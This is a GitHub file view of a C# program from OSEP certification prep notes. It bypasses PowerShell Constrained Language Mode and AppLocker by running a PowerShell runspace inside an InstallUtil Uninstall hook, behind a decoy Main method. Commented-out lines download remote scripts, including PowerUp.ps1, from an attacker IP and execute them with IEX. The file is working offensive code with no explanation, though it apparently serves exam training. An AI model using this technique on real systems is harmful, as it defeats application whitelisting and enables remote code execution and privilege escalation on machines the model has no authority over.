forked from onurgule/OSEP-Prep-Notes
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathBypass_CLM_And_AppLocker.cs
33 lines (31 loc) · 1.4 KB
/
Bypass_CLM_And_AppLocker.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("This is the main method which is a decoy");
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Windows\\Tasks\\test.txt";
// String cmd = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.233/PowerUp.ps1') | IEX; Invoke-AllChecks | Out-File -FilePath .\\tc.txt"; //Just Invoke-Allchecks with Powerup and writes a file.
// String cmd = "try { (New-Object System.Net.WebClient).DownloadString('http://192.168.45.233/run.txt') | IEX } catch { $_ | Format-List * -Force | Out-String | Out-File -FilePath .\\exc.txt}"; // Downloads run.txt and runs, if catches any exception, writes in to exc.txt.
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}